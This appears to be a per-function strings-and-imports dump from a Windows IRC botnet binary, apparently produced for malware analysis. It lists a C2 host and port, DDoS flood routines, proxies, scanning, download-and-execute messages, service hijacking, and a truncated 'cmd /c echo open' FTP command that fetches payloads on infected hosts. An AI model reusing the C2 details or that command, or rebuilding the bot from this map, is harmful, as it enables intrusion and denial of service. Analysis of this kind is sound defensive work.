sub_outside():
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	MSVCRT.strncmp
	KERNEL32.Process32Next
	MSVCRT.strstr
	MSVCRT.strncpy
	MSVCRT.wcscat
	MSVCRT.ftell
	MSVCRT.fseek
	WS2_32.send
	WS2_32.recv
	WS2_32.ntohs
	WS2_32.recvfrom
	WS2_32.inet_ntoa
	MSVCRT.atoi
	MSVCRT.rand
	MSVCRT.free
	MSVCRT.sprintf
	KERNEL32.InterlockedCompareExchange
	MSVCRT._errno
	MSVCRT._iob
	MSVCRT._adjust_fdiv

sub_42D230(01e7):
	"%s\n"
	"%s\r\n"

sub_4203A0(0303):
	"ServicesActive"

sub_431070(03f4):
	KERNEL32.InterlockedCompareExchange

sub_419360(064a):
	MSVCRT._stricmp
	WS2_32.ntohs

	" "
	"established"
	"listening"
	"%s:%d"
	"%s:%d"
	"%s: %d"
	"%s: %s"

sub_41D8D0(0686):
	":"
	":"
	":"
	"ftp(badlogin)"
	"ftp(getting)"
	"ftp(baddl)"
	"http(badconnect)"
	"GET %s HTTP/1.0\r\nConnection: Keep-Alive"...
	"http(getting)"
	"wb"
	"http(badopen)"
	"\r\n\r\n"
	"dl, done. %s ."
	"open	%s."
	"dl'ed-update: %s"
	"exec.error"

sub_42A8A0(097a):
	WS2_32.select
	WS2_32.socket
	WS2_32.send

sub_406890(1271):
	"95"
	"NT"
	"98"
	"ME"
	"2000"
	"XP"
	"2003"
	"???"
	"%s [%s]"
	"CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "...

sub_413BE0(17e9):
	":"
	":"
	":"

sub_42A1E0(1e46):
	"[%s] Starting	Socks4 Proxy on	port %d."
	"[%s] Unloaded	proxy on %d."

sub_40C480(1fae):
	" "
	"[DCC]: Failed	to create socket."
	"dcc: failed to bind socket"
	"dcc: failed to open socket"
	"dcc: file doesn't exist"
	"[DCC]: File doesn't exist."
	"dcc: timeout"
	"dcc: unable to open socket"
	"dcc: complete	to %s, file: %s, (%d byte"...
	"dcc: socket error"

sub_40B780(1ff1):
	"true"

sub_406C30(224d):
	MSVCRT.strtok

	" "
	" "
	"-update"
	"-netsvcs"
	"-bai"
	"-bai"
	" "
	" "

sub_420880(235a):
	"AudioSrv"
	"Browser"
	"CryptSvc"
	"Dhcp"
	"dmserver"
	"Dnscache"
	"ERSvc"
	"Eventlog"
	"EventSystem"
	"FastUserSwitchingCompatibility"
	"helpsvc"
	"lanmanserver"
	"lanmanworkstation"
	"LmHosts"
	"Netman"
	"PlugPlay"
	"PolicyAgent"
	"ProtectedStorage"
	"RasMan"
	"RpcSs"
	"SamSs"
	"Schedule"
	"seclogon"
	"SENS"
	"ShellHWDetection"
	"Spooler"
	"SSDPSRV"
	"stisvc"
	"TapiSrv"
	"TermService"
	"TrkWks"
	"upnphost"
	"W32Time"
	"winmgmt"
	"WZCSVC"
	"wuauserv"
	"Themes"
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"[%s] [????.exe] (Unknown key)"
	"ImagePath"
	"[%s] [????.exe]"
	"[%s]	[%s]"

sub_4282E0(28e3):
	WS2_32.closesocket

sub_422AE0(2bbb):
	MSVCRT.atoi
	WS2_32.send
	MSVCRT.strrchr

	"scan: cip (%s)"
	"scan:	not started"
	" "
	"ftp: port: %d, total sends: %d"
	"scan:	stopped	(%d threads)"
	"scan:	couldn't stop"
	" "
	"scan:	too many threads (%s)"
	" "
	"scan: stats:"
	" %s:	%d,"
	" total: %d"
	" "
	" "
	" "
	" "
	" "
	"scan:	invalid	port"
	" "
	" "
	" "
	"scan:	no ip specified"
	"random"
	"sequential"
	"Scan(%s): %s Port Scan %s:%d - Delay %d"...

sub_42B5D0(2efa):
	WS2_32.ioctlsocket
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

sub_42CBA0(2f99):
	MSVCRT.fprintf
	MSVCRT.strncmp

	"Control socket read failed"
	"%s"
	"%s"

sub_412050(3261):
	" "
	" "
	"%s %s :%s\r\n"
	"%s"
	" "
	"%s"
	" "
	" "
	"%s %s %s\r\n"
	" "
	"%s %s\r\n"
	"%s\r\n"
	" "
	" "
	" "
	" "
	" "
	"%s %s %s %s\r\n"

sub_42A680(3685):
	WS2_32.socket
	WS2_32.sendto
	WS2_32.closesocket

sub_413850(387f):
	"%2.2X"

sub_41B9F0(3942):
	MSVCRT.rand

sub_4315F0(3979):
	MSVCRT.free

sub_40CFE0(3a67):
	MSVCRT._snprintf

	"%s\\*"
	"Found: %s\\%s"

sub_4448D0(3b76):
	MSVCRT._adjust_fdiv

sub_40F000(3c9d):
	"ServicesActive"

sub_41A350(3f94):
	WS2_32.WSAGetLastError
	WS2_32.select

sub_40F0A0(41a8):
	"ServicesActive"

sub_4268B0(4314):
	IPHLPAPI.IcmpCreateFile
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle

	"ICMP.DLL"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"

sub_420EB0(4321):
	":"
	"http"
	"ftp"
	"/"
	"/"
	"@"
	":"
	"/"
	"@"
	":"
	"http"
	"ftp"
	"/"
	"@"
	":"
	"/"
	"@"
	":"
	":"
	"/"
	":"
	"http"
	"ftp"
	"/"
	"/"
	"/"
	"/"

sub_42DEB0(43bb):
	"net_write(1) returned	%d, errno = %d\n"
	"net_write(2) returned	%d, errno = %d\n"

sub_423700(4699):
	"%d.%d.%d.%d"

sub_414DB0(4f91):
	" "
	" "

sub_40F120(548c):
	"ServicesActive"

sub_431310(57b7):
	"KERNEL32.DLL"
	"InterlockedCompareExchange"

sub_426D70(5aef):
	WS2_32.socket

sub_42BEF0(6061):
	MSVCRT.atoi

	" "
	" "
	" "
	" "
	" "
	"true"
	" "
	" "
	" "
	"root"
	" "
	"[Socks5] Starting Redirect [Port %d :: "...
	" "

sub_40DBC0(611d):
	"%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n"
	"%%comspec%% /c %s	%s"

sub_407790(639f):
	"irc.alfree5.info"
	"3366"
	"KB15763.exe"
	"sdfsadasda"

sub_40ECA0(6573):
	"-netsvcs"

sub_42B430(68e9):
	WS2_32.recv
	WS2_32.send

sub_426730(69b7):
	"%s: %s (%utimes/%ubytes/%dms)"
	"[%s] Finished	flooding %s %d Times"
	"[%s] Cannot send pings - Doesn't have D"...

sub_5DEBA4(6b5c):
	MSVCRT._iob

sub_40CC30(6d2d):
	" "
	" "
	"\\"
	"Files Found: %d"

sub_425740(7228):
	WS2_32.closesocket

sub_429D90(75a9):
	"Socks4"

sub_429A50(75a9):
	"HTTP"

sub_4264E0(75a9):
	"ping"

sub_426A30(75a9):
	"forsyn"

sub_426F40(75a9):
	"syn"

sub_427620(75a9):
	"udp"

sub_42A120(75a9):
	"Socks4"

sub_426AF0(7928):
	"%s: %s:%u (%dseconds)"
	"%s: error creating threads"
	"%s: attack@%s:%d done."
	"%s"

sub_4066E0(7a4c):
	"up:	%dd %dh	%dm"

sub_40A200(7c6d):
	MSVCRT.strstr

sub_429CC0(80fe):
	"[%s] Starting	proxy on %d with SSL."
	"[%s] Starting	proxy on port %d."
	"[%s] Unloaded	proxy on port %d."

sub_435780(8399):
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	"HKCR: %s"
	" "
	" "
	"HKU:	%s"
	"Software\\Microsoft\\Windows\\CurrentVersi"...
	"ProductId"
	"Found	Windows	Product	ID (%s)."

sub_42EAD0(89f2):
	MSVCRT.free

	"QUIT"

sub_404C70(8b82):
	" "
	" "
	"exec.error"
	" "
	" "
	"open"
	" "
	" "
	" "
	"%s resolved %s"
	" "
	" "
	"%s -> %s"
	" "
	"resolve.error	%s."
	"%s %s\r\n"
	"%s"
	" "
	"Executed:	%s."
	"exec.error"
	" "
	"%s"
	"%s %s\r\n"
	" "
	"N"
	"Software\\Microsoft\\OLE"

sub_40B700(8dfb):
	"true"

sub_5A55E5(8e78):
	MSVCRT._adjust_fdiv
	MSVCRT._iob

sub_422890(902a):
	"asn"

sub_433AB0(9072):
	"�"

sub_42E490(90b9):
	MSVCRT.fread
	MSVCRT.fwrite

	"short	write: passed %d, wrote	%d\n"
	"localfile write"

sub_4034E0(917c):
	"|"
	"a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"...

sub_42F8D0(9547):
	MSVCRT._errno

sub_41F900(95c9):
	MSVCRT.rand
	WS2_32.closesocket

sub_427850(979e):
	MSVCRT.rand
	WS2_32.sendto

sub_40A140(9cfe):
	MSVCRT.strchr

sub_42E060(a081):
	MSVCRT.free

sub_40D600(a348):
	MSVCRT.strncat

	"kernel32.dll"
	"RegisterServiceProcess"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"%s%c%s"
	" -bai "

sub_42B910(a348):
	"[%s] Redirecting from	Port %d	to '%s:%d"...
	"[%s] Finished	redirecting from port %d "...

sub_4205D0(a712):
	"PSAPI.DLL"
	"PSAPI.DLL"
	"EnumProcessModules"
	"GetModuleFileNameExA"
	"unknown"

sub_40FFD0(acac):
	MSVCRT.strstr

	"%d.%d.%d.%d"
	"%s %s\r\n"
	"%s %s\r\n%s %s 0 0 :%s\r\n"
	" "
	" "
	" "
	" "
	"%s %s\r\n"
	" "
	" "
	" "
	"%s %s\r\n"
	"%s %s %s\r\n"
	" "
	"%s %s %s\r\n"
	"%s %s\r\n"
	" "
	" "
	"@"
	":"
	"|"
	"|"
	" -s"
	" -n"
	" -o"
	" "
	" "
	"|"
	"|"
	" "
	" -o"
	" -s"
	" -n"
	":"
	" "
	"!"
	"!"
	"@"
	"@"
	" "
	" "
	" :"
	" "
	" "
	" "
	" "
	" "
	":"
	"!"
	"%s %s %s\r\n"
	" "
	":"
	"!"
	" :"
	" :"
	" "
	" "
	":"
	"!"
	":"
	"!"
	":"
	"!"

sub_4280D0(b1b6):
	"[%s] Started redirect	from \"%s\" to \"%s\""...
	"[%s] Finished	redirect from \"%s\" to	\"%s"...

sub_41E700(b206):
	"%d. - Pid: %d - \"%s\""
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "

sub_42D610(b28f):
	"Invalid direction %d\n"
	"Invalid	mode %c\n"
	"PASV"
	"%u,%u,%u,%u,%u,%u"

sub_4250A0(b433):
	WS2_32.ntohs

	"cmd /c echo open %s %d >> ii &echo user"...

sub_42CCE0(c866):
	"\r\n"
	"read"

sub_419FF0(ca0b):
	MSVCRT.strstr

sub_404640(caf0):
	" -o"
	" "
	" "
	" "
	" "

sub_42D350(cb20):
	MSVCRT.sprintf

	"Missing path argument	for file transfer"...
	"Invalid open type %d\n"

sub_420190(cc5a):
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"ImagePath"
	"\\"

sub_4248C0(cd36):
	"�B�B�B�B"
	"CCCC"

sub_42D160(cf06):
	MSVCRT.sprintf

	"USER	%s"
	"PASS	%s"

sub_41EFD0(cfad):
	WS2_32.send
	MSVCRT.atoi

	"220	\r\n"
	"220 \r\n"
	"331	\r\n"
	"331 \r\n"
	"230	\r\n"
	"230 \r\n"
	"200	\r\n"
	"200 \r\n"
	" "
	","
	","
	","
	","
	","
	","
	"%d.%d.%d.%d"
	"200	\r\n"
	"200 \r\n"
	"150	\r\n"
	"150 \r\n"
	"rb"
	"ftp: %d.%d.%d.%d -> (%d bytes) (total	s"...
	"226	\r\n"
	"226 \r\n"
	"221	\r\n"
	"221 \r\n"

sub_41C6B0(d173):
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "

sub_4129E0(d41e):
	"%s %s :%s\r\n"

sub_41BD30(d56c):
	MSVCRT.strtok

sub_424EA0(e942):
	WS2_32.send

sub_4276E0(e9eb):
	"%s: %s:%u	(%ut/%ub/%dms)"
	"%s: %s:%d done"

sub_42C8A0(edf1):
	"tcp"
	"ftp"
	"tcp"

sub_429E50(efa7):
	WS2_32.recv
	WS2_32.ioctlsocket
	WS2_32.closesocket

sub_427000(f15c):
	"%s: %s:%u	(%usec/%dms)"

sub_419B80(f59b):
	MSVCRT.strncpy

	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"

sub_420030(f698):
	"unknown"

sub_40EDE0(f6b8):
	"ServicesActive"

sub_428350(f7bb):
	MSVCRT.strncat
	MSVCRT.strstr
	WS2_32.recv
	WS2_32.closesocket

	" "
	" "
	"http"
	" "
	"CONNECT"
	"connect"
	" "
	":"
	" "
	":"
	" "
	":"
	" "
	" "
	"HTTPROX"
	"\r\n"
	"\r\n"
	"\r\n"
	"Proxy-Connection:"
	":"
	"Keep-Alive"
	"%s %s	%s\r\nConnection: Keep-Alive\r\n%s"
	"%s %s	%s\r\nConnection: close\r\n%s"
	"\r\n"
	"\r\n"
	" "
	" "
	" "
	"Transfer-Encoding:"
	" "
	"chunked"
	" "
	"Connection:"
	" "
	"Keep-Alive"
	"\r\n"
	"\r\n"
	"\r\n"
	"Connection: Keep-Alive\r\n"
	"Connection: Keep-Alive\r\n"
	"Connection: Close\r\n"
	"Connection: Close\r\n"
	"\r\n"
	"HTTP/1.0 200 Connection established\r\n\r\n"...
	"HTTP/1.0 503 Service Unavailable\r\nServe"...
	"HTTP/1.0 503 Service Unavailable\r\nServe"...

sub_431990(f851):
	MSVCRT.free

sub_412720(f93f):
	"%d.%d.%d.%d"
	"lan:	"
	". "
	". "
	"[PRIVATE]"
	"[PUBLIC]"

sub_427B60(f9fa):
	WS2_32.recv

sub_42AF50(fa28):
	WS2_32.accept

sub_423800(fb69):
	MSVCRT.rand

	"%d.%d.%d.%d"

sub_41A770(ffcd):
	WS2_32.select